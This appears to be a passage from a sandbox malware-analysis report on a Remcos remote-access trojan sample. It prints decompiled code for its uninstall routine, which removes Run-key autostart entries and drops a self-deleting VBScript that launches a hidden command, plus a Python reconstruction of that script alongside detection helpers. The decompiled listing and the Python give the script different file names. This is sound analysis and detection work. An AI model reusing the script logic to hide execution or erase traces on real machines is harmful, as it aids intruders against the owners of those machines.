                                        				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				// Write the script to disk (per the subcall listing: CreateFileW with GENERIC_WRITE, CREATE_ALWAYS);
                                        				// the byte count is length << 1, i.e. the text is written as UTF-16.
                                        				_t84 = E00412D56( &_v40, _t82 << 1, _t82 << 1, _t82, 0);
                                        				if(_t84 != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					// Launch the .vbs through its registered handler with a hidden window; ShellExecuteW returns a value > 32 on success,
                                        					// after which the process exits so the script's delete loop can succeed.
                                        					_t84 = ShellExecuteW(0, L"open", _t84, 0x415800, 0x415800, 0);
                                        					if(_t84 > 0x20) {
                                        						exit(0);
                                        					}
                                        				}
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _t84;
                                        			}
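The update.vbs that the routine above assembles can be reconstructed from the string fragments in the listing. The Python below is an added example written for this page, not code from the sample or from the sandbox report: build_update_vbs() mirrors the concatenation (including the _v5-gated while/wend loop and the empty-install-directory check), parse_uninstall_script() and looks_like_remcos_uninstall() recognise a captured copy of the script, and scan_temp_for_update_vbs() checks the drop location the routine uses. The sample paths and the command string are constructed placeholders, the helper names are invented for the example, and the UTF-16 encoding is inferred from the length << 1 byte count handed to the file writer.

```python
"""Reconstruct and recognise the %Temp%\\update.vbs self-delete script from the decompiled routine."""
import os
import re

# Constructed sample values (not taken from the report). In the binary these come from the
# HKCU "exepath" value or GetModuleFileNameW, the directory string at 0x41bc68, and the
# command string passed to the routine as its argument (_a4).
SAMPLE_EXE_PATH = r"C:\Users\victim\AppData\Roaming\remcos\remcos.exe"
SAMPLE_INSTALL_DIR = r"C:\Users\victim\AppData\Roaming\remcos"
SAMPLE_COMMAND = r"C:\Users\victim\AppData\Local\Temp\new_agent.exe"


def build_update_vbs(exe_path, install_dir, command, attributes_reset_ok=True):
    """Assemble the script exactly as the routine concatenates it.

    attributes_reset_ok stands in for the decompiled _v5 flag: the while/wend loop that retries
    the delete is emitted only when SetFileAttributesW(exe, FILE_ATTRIBUTE_NORMAL) succeeded.
    An empty install_dir skips the DeleteFolder line, matching the operator!= check.
    """
    script = 'Set fso = CreateObject("Scripting.FileSystemObject")\n'
    script += 'On Error Resume Next\n'
    if attributes_reset_ok:
        script += f'while fso.FileExists("{exe_path}")\n'
    script += f'fso.DeleteFile "{exe_path}"\n'
    if attributes_reset_ok:
        script += 'wend\n'
    if install_dir:
        script += f'fso.DeleteFolder "{install_dir}"\n'
    # Window style 0 hides the cmd window; VBScript doubles the quotes around the command.
    script += f'CreateObject("WScript.Shell").Run "cmd /c ""{command}""", 0\n'
    script += 'fso.DeleteFile(Wscript.ScriptFullName)'   # no trailing newline in the original
    return script


_RE_DELETE_FILE = re.compile(r'^fso\.DeleteFile\s+"([^"]+)"\s*$', re.M)
_RE_DELETE_FOLDER = re.compile(r'^fso\.DeleteFolder\s+"([^"]+)"\s*$', re.M)
_RE_RUN = re.compile(r'CreateObject\("WScript\.Shell"\)\.Run\s+"cmd /c ""(.*?)""",\s*0')
_RE_WAIT_LOOP = re.compile(r'^while\s+fso\.FileExists\("([^"]+)"\)', re.M)
_RE_SELF_DELETE = re.compile(r'fso\.DeleteFile\(Wscript\.ScriptFullName\)', re.I)


def parse_uninstall_script(text):
    """Pull the actionable facts out of a captured script: what it deletes and what it launches."""
    return {
        "deleted_files": _RE_DELETE_FILE.findall(text),
        "deleted_folders": _RE_DELETE_FOLDER.findall(text),
        "run_commands": _RE_RUN.findall(text),
        "waits_for": _RE_WAIT_LOOP.findall(text),
        "self_deletes": bool(_RE_SELF_DELETE.search(text)),
    }


def looks_like_remcos_uninstall(text):
    """True when the script has the shape of the routine's output.

    Requires a FileSystemObject delete of a file plus the script's own self-delete. The hidden
    cmd /c launch and the wait loop are strong corroboration but are not required, because the
    binary itself omits the loop when the attribute reset fails.
    """
    facts = parse_uninstall_script(text)
    return bool(facts["deleted_files"]) and facts["self_deletes"]


def scan_temp_for_update_vbs(temp_dir=None):
    """Check the drop location the routine uses; returns the parsed facts, or None if nothing matches."""
    temp_dir = temp_dir or os.environ.get("Temp") or os.environ.get("TMP") or "/tmp"
    path = os.path.join(temp_dir, "update.vbs")
    if not os.path.isfile(path):
        return None
    # UTF-16LE is inferred from the length << 1 byte count passed to the writer (assumption).
    with open(path, "r", encoding="utf-16-le", errors="ignore") as fh:
        text = fh.read().lstrip("\ufeff")
    return parse_uninstall_script(text) if looks_like_remcos_uninstall(text) else None


if __name__ == "__main__":
    vbs = build_update_vbs(SAMPLE_EXE_PATH, SAMPLE_INSTALL_DIR, SAMPLE_COMMAND)
    print(vbs)
    print(parse_uninstall_script(vbs))
```

Run it directly to see the reconstructed script and the facts extracted from it; point scan_temp_for_update_vbs() at a live %Temp% on a suspect host to check whether the dropped copy is still present (the script deletes itself only after the loop completes, so a locked binary leaves it on disk).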

                                        Instruction addresses covered by the listing above: 0x004085b5 through 0x004089a5

                                        APIs
                                          • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                          • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004085E9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 00408613
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040862F
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040864F
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040866F
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00408678
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 00408698
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 004086B6
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004086BE
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 004086C6
                                        • SetFileAttributesW.KERNEL32(?,00000080), ref: 004086E3
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 004086F7
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00408709
                                        • SetFileAttributesW.KERNEL32(00000000), ref: 00408710
                                          • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                          • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                          • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                        • _wgetenv.MSVCRT ref: 00408720
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040872B
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408736
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408741
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 00408753
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 00408763
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040876E
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 0040878D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 0040879D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087AA
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004087B6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087BF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087C8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087D1
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004087F0
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087FB
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408808
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408814
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040881D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408826
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040882F
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 00408843
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408850
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 00408867
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408874
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408880
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408889
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408892
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 004088A9
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",00000000,?,00000000), ref: 004088C0
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088CB
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088D8
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004088E5
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004088F1
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004088FA
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408903
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040890C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408915
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040891E
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 0040892C
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408938
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408942
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040894E
                                          • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408967
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408974
                                        • exit.MSVCRT ref: 00408980
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408989
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408992
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040899B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$G@2@@0@V?$basic_string@$?c_str@?$basic_string@Hstd@@$??0?$basic_string@G@1@@V01@V10@Y?$basic_string@$D@2@@std@@D@std@@FileV01@@$TerminateV10@@$??9std@@AttributesThreadV10@0@$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                        • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                        • API String ID: 1819783940-1536747724
                                        • Opcode ID: 7814478d81375f36d2fa1a1643ff22bfee750f7fbdb2a6f4e976380ae596cf00
                                        • Instruction ID: 422d0979f444bffee83793bc3d795cbcdb9f6e23a9fd2fc637ca2dc4c5c01907
                                        • Opcode Fuzzy Hash: 7814478d81375f36d2fa1a1643ff22bfee750f7fbdb2a6f4e976380ae596cf00
                                        • Instruction Fuzzy Hash: 7DB15FB2800509EBCB04EBE0ED4D9EE777CEF94345B54407AF902A3191DF795A48CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 19%
                                        			E00408245() {
                                        				char _v0;
                                        				signed int _v5;
                                        				char _v6;
                                        				signed int _v9;
                                        				char _v10;
                                        				char _v24;
                                        				char _v28;
                                        				char _v40;
                                        				char _v44;
                                        				char _v56;
                                        				char _v60;
                                        				char _v72;
                                        				char _v76;
                                        				char _v88;
                                        				char _v92;
                                        				void* _v108;
                                        				void* _v124;
                                        				void _v606;
                                        				short _v608;
                                        				short _v644;
                                        				void* _t112;
                                        				void* _t114;
                                        				char* _t116;
                                        				WCHAR* _t118;
                                        				signed char _t120;
                                        				char* _t121;
                                        				char* _t123;
                                        				char* _t126;
                                        				char* _t127;
                                        				char* _t128;
                                        				short* _t131;
                                        				void* _t132;
                                        				char* _t134;
                                        				WCHAR* _t137;
                                        				char* _t138;
                                        				char* _t140;
                                        				char* _t143;
                                        				char* _t144;
                                        				char* _t145;
                                        				char* _t146;
                                        				signed int* _t148;
                                        				char* _t149;
                                        				char* _t150;
                                        				signed int _t151;
                                        				short* _t153;
                                        				char* _t154;
                                        				char* _t155;
                                        				WCHAR* _t157;
                                        				char* _t158;
                                        				char* _t159;
                                        				char* _t163;
                                        				WCHAR* _t165;
                                        				char* _t166;
                                        				char* _t167;
                                        				intOrPtr* _t174;
                                        				short* _t285;
                                        				void* _t297;
                                        				void* _t299;
                                        				void* _t301;
                                        				void* _t303;
                                        				void* _t304;
                                        				void* _t305;
                                        				void* _t306;
                                        				void* _t308;
                                        				void* _t310;
                                        
                                        				// Per the subcall listing: TerminateProcess followed by WaitForSingleObject.
                                        				_t112 = E0040AC8C();
                                        				// When the flag byte at 0x41b154 is not '0' (0x30), tear down the hook threads
                                        				// (TerminateThread / UnhookWindowsHookEx inside E00406D41).
                                        				if( *0x41b154 != 0x30) {
                                        					_t112 = E00406D41(0x41b900);
                                        				}
                                        				if( *0x41c118 == 1) {
                                        					_t112 = E0041050F(_t112);
                                        				}
                                        				if( *0x41b22a != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t112 = E00412BEE(_t112);
                                        				}
                                        				// E0040B9E8 is called with (hive, Run-key path, value name) for HKCU Run, HKLM (0x80000002) Run and
                                        				// HKLM Policies\Explorer\Run, each behind its own config flag; its body is not shown here, but in this
                                        				// uninstall routine it presumably removes the autorun entry.
                                        				_t172 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                        				if( *0x41ba58 == 1) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t112 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t112);
                                        					_t297 = _t297 + 0xc;
                                        				}
                                        				if( *0x41bc64 == 1) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t112 = E0040B9E8(0x80000002, _t172, _t112);
                                        					_t297 = _t297 + 0xc;
                                        				}
                                        				if( *0x41ba20 == 1) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t112);
                                        					_t297 = _t297 + 0xc;
                                        				}
                                        				_v608 = _v608 & 0x00000000;
                                        				_t114 = memset( &_v606, 0, 0x81 << 2);
                                        				asm("stosw");
                                        				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t116 = E0040B692(0x80000001,  &_v608, "exepath",  &_v608, 0x208, _t114, _t114);
                                        				_t299 = _t297 + 0x28;
                                        				if(_t116 == 0) {
                                        					_t116 = GetModuleFileNameW(0,  &_v608, 0x208);
                                        				}
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				RegDeleteKeyA(0x80000001, _t116);
                                        				_t174 = __imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z;
                                        				_v5 = 1;
                                        				_t118 =  *_t174(0x41bc68, 0x415800);
                                        				if(_t118 != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					SetFileAttributesW(_t118, 0x80);
                                        				}
                                        				_t120 = SetFileAttributesW( &_v608, 0x80);
                                        				if(_t120 == 0) {
                                        					_v5 = _v5 & _t120;
                                        				}
                                        				_t121 =  &_v6;
                                        				__imp___wgetenv(L"Temp", _t121, L"\\uninstall.vbs");
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t121);
                                        				L00414146();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t121);
                                        				_t123 =  &_v6;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t123);
                                        				L0041416A();
                                        				_t301 = _t299 + 0x18;
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v24, L"On Error Resume Next\n", _t123);
                                        				if(_v5 != 0) {
                                        					_t165 =  &_v608;
                                        					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t165,  &_v6, L"\")\n");
                                        					_t166 =  &_v72;
                                        					L0041416A();
                                        					_t167 =  &_v40;
                                        					L00414146();
                                        					_t301 = _t301 + 0x18;
                                        					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t167, _t167, _t166, _t166, L"while fso.FileExists(\"", _t165);
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				}
                                        				_t126 =  &_v6;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t126,  &_v608, L"\"\n");
                                        				_t127 =  &_v72;
                                        				L00414146();
                                        				_t128 =  &_v56;
                                        				L00414146();
                                        				_t303 = _t301 + 0x18;
                                        				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t128, _t128, _t127, _t127, _t126);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				if(_v5 != 0) {
                                        					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
                                        				}
                                        				_push(0x415800);
                                        				_push(0x41bc68);
                                        				if( *_t174() != 0) {
                                        					_t163 =  &_v72;
                                        					L0041416A();
                                        					_t129 =  &_v56;
                                        					L00414146();
                                        					_t303 = _t303 + 0x18;
                                        					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t129, _t129, _t163, _t163, L"fso.DeleteFolder \"", 0x41bc68, L"\"\n");
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				}
                                        				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				_t131 = E00412D56( &_v24, _t129 << 1, _t129 << 1, _t129, 0);
                                        				_t304 = _t303 + 0x10;
                                        				if(_t131 != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					ShellExecuteW(0, L"open", _t131, 0x415800, 0x415800, 0);
                                        				}
                                        				exit(0);
                                        				_pop(_t280);
                                        				_pop(_t291);
                                        				_pop(_t175);
                                        				_t305 = _t304 - 0x27c;
                                        				_t132 = E0040AC8C();
                                        				if( *0x41b154 != 0x30) {
                                        					_t132 = E00406D41(0x41b900);
                                        				}
                                        				if( *0x41c118 == 1) {
                                        					_t132 = E0041050F(_t132);
                                        				}
                                        				if( *0x41b22a != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t132 = E00412BEE(_t132);
                                        				}
                                        				_t176 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                        				if( *0x41ba58 == 1) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t132 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t132);
                                        					_t305 = _t305 + 0xc;
                                        				}
                                        				if( *0x41bc64 == 1) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t132 = E0040B9E8(0x80000002, _t176, _t132);
                                        					_t305 = _t305 + 0xc;
                                        				}
                                        				if( *0x41ba20 == 1) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t132 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t132);
                                        					_t305 = _t305 + 0xc;
                                        				}
                                        				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t134 = E0040B692(0x80000001,  &_v644, "exepath",  &_v644, 0x208, _t132, _t132);
                                        				_t306 = _t305 + 0x1c;
                                        				if(_t134 == 0) {
                                        					_t134 = GetModuleFileNameW(0,  &_v644, 0x208);
                                        				}
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				RegDeleteKeyA(0x80000001, _t134);
                                        				_v9 = 1;
                                        				_t137 = SetFileAttributesW( &_v644, 0x80);
                                        				if(_t137 == 0) {
                                        					_v9 = _v9 & _t137;
                                        				}
                                        				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                        				if(_t137 != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					SetFileAttributesW(_t137, 0x80);
                                        				}
                                        				_t138 =  &_v10;
